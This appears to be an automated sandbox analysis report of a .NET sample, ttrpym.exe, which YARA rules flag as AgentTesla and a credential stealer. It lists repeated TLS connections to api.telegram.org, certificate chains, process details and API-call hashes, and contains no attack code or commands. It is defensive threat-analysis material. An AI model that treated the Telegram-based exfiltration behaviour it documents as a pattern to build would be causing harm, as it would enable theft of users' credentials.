                                                                                                                      Jan 27, 2021 15:41:40.411825895 CET149.154.167.220443192.168.2.749765CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:45.141561031 CET149.154.167.220443192.168.2.749766CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:56.357264996 CET149.154.167.220443192.168.2.749767CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:03.210078001 CET149.154.167.220443192.168.2.749768CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:11.882802963 CET149.154.167.220443192.168.2.749769CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:20.660326004 CET149.154.167.220443192.168.2.749770CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:31.467353106 CET149.154.167.220443192.168.2.749771CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:37.710154057 CET149.154.167.220443192.168.2.749772CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Start time:15:39:38
                                                                                                                      Start date:27/01/2021
                                                                                                                      Path:C:\Users\user\Desktop\ttrpym.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\Desktop\ttrpym.exe'
                                                                                                                      Imagebase:0xb80000
                                                                                                                      File size:907776 bytes
                                                                                                                      MD5 hash:3B53C639BD8EA883E5036A040F833415
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:15:39:52
                                                                                                                      Start date:27/01/2021
                                                                                                                      Path:C:\Users\user\Desktop\ttrpym.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:{path}
                                                                                                                      Imagebase:0xaa0000
                                                                                                                      File size:907776 bytes
                                                                                                                      MD5 hash:3B53C639BD8EA883E5036A040F833415
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                      Reset < >

                                                                                                                        Executed Functions

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DB97F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 1439edc56ad4c273a4eda3ba83fc04370a7a68e9b44f0c0276c133f812f3e032
                                                                                                                        • Instruction ID: 34890e4dde39fd49b75454b86192b4155957829160781d2cf3ca9d605e1d8ea7
                                                                                                                        • Opcode Fuzzy Hash: 1439edc56ad4c273a4eda3ba83fc04370a7a68e9b44f0c0276c133f812f3e032
                                                                                                                        • Instruction Fuzzy Hash: 697113B0A00B858FD725DF2AD46479AB7F5BF88204F00892ED596D7B50DB34E845CF91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB5421
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: a9e90e5ffbdd5d57ee2fa3358ac6223b280d5ee54fe87adb55195df502a11189
                                                                                                                        • Instruction ID: 0f4ae5d1d6ecb335297410bdda65a4c49f9a5b2721c2dd0201f48fae79a87dc0
                                                                                                                        • Opcode Fuzzy Hash: a9e90e5ffbdd5d57ee2fa3358ac6223b280d5ee54fe87adb55195df502a11189
                                                                                                                        • Instruction Fuzzy Hash: 7541EFB1C0062CCFDB24CFA9D894BDEBBB1BF48308F61806AD449AB250D775594ACF90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB5421
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: adcc63d7cb68808613264c5756938e26501e837d7e1791ec6ac69e8cf705541d
                                                                                                                        • Instruction ID: e12b1699bafdc648c23e50d2c6f33dc74e99cd4c45b439b04604323b258998d1
                                                                                                                        • Opcode Fuzzy Hash: adcc63d7cb68808613264c5756938e26501e837d7e1791ec6ac69e8cf705541d
                                                                                                                        • Instruction Fuzzy Hash: 0A41D1B0C0461CCFDB25DFA9D884BDEBBB1BF48308F61806AD519AB250D7756949CF90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DB9871,00000800,00000000,00000000), ref: 02DB9A82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: efadf0d6423e8550af2a1bd00cc9ee1d416fdc3dc8bf964de149b4291febb0c4
                                                                                                                        • Instruction ID: 17ce2af7d21aad0168d49eef47090d660933d97406318e770cf3e7fd952373be
                                                                                                                        • Opcode Fuzzy Hash: efadf0d6423e8550af2a1bd00cc9ee1d416fdc3dc8bf964de149b4291febb0c4
                                                                                                                        • Instruction Fuzzy Hash: 54218BB28083898FDB11CFA9C4A4BCEBBB4EF59314F15846AD556A7300C3749945CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBBA96,?,?,?,?,?), ref: 02DBBB57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: a0734c17f6e2468179602164ca792a18530b3312bc05159710c685f6192216df
                                                                                                                        • Instruction ID: 8c5104b525df1ca41f6319e00740e910c63a05263af219f465abf915c7def1cd
                                                                                                                        • Opcode Fuzzy Hash: a0734c17f6e2468179602164ca792a18530b3312bc05159710c685f6192216df
                                                                                                                        • Instruction Fuzzy Hash: 5E2103B590020CDFDB10CF9AD984ADEBBF4EB48324F14802AE955B3310D374A944CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBBA96,?,?,?,?,?), ref: 02DBBB57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 2456b9ada0b02d59078052ee840c5bcfe5e59c5f8e4ecc70ac0d67440bb00843
                                                                                                                        • Instruction ID: c6332eda2eb251c9e5ec94db56098fa2a6b9f14a18405c2bdae625a3ed831f0a
                                                                                                                        • Opcode Fuzzy Hash: 2456b9ada0b02d59078052ee840c5bcfe5e59c5f8e4ecc70ac0d67440bb00843
                                                                                                                        • Instruction Fuzzy Hash: F521E3B5900248AFDB10CF99D984ADEBBF4EF48324F14802AE955A3310D374A944CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DB9871,00000800,00000000,00000000), ref: 02DB9A82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: 0462b79344648f40553f1650ea636f3c1af9c48f3872ac79edcb0129c922e7d1
                                                                                                                        • Instruction ID: b778e640e20b8b08fc1d4c232fe81ce69c02ee3e73e40be9346b59a280f76864
                                                                                                                        • Opcode Fuzzy Hash: 0462b79344648f40553f1650ea636f3c1af9c48f3872ac79edcb0129c922e7d1
                                                                                                                        • Instruction Fuzzy Hash: 2E1103B2D042498FDB10CF9AC484ADEFBF4EB89314F04842AE916A7300C374A945CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DB9871,00000800,00000000,00000000), ref: 02DB9A82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: ac4cf45eb6f08704e217df75e18bede9480a7f3d7f6a84cb8df56f0be7fc693c
                                                                                                                        • Instruction ID: a01d606921924acc7fa63046fd1db636196dcaee1e2a086f81f298fc767adfb8
                                                                                                                        • Opcode Fuzzy Hash: ac4cf45eb6f08704e217df75e18bede9480a7f3d7f6a84cb8df56f0be7fc693c
                                                                                                                        • Instruction Fuzzy Hash: AE1114B29042498FCB10CFAAC484BDEFBF8EF89314F04852AD555A7300C374A945CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DB97F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: f81d29383d38cdfd76ae14beef3c68458b3833d8e8ed35933b5b786be0ad4eb9
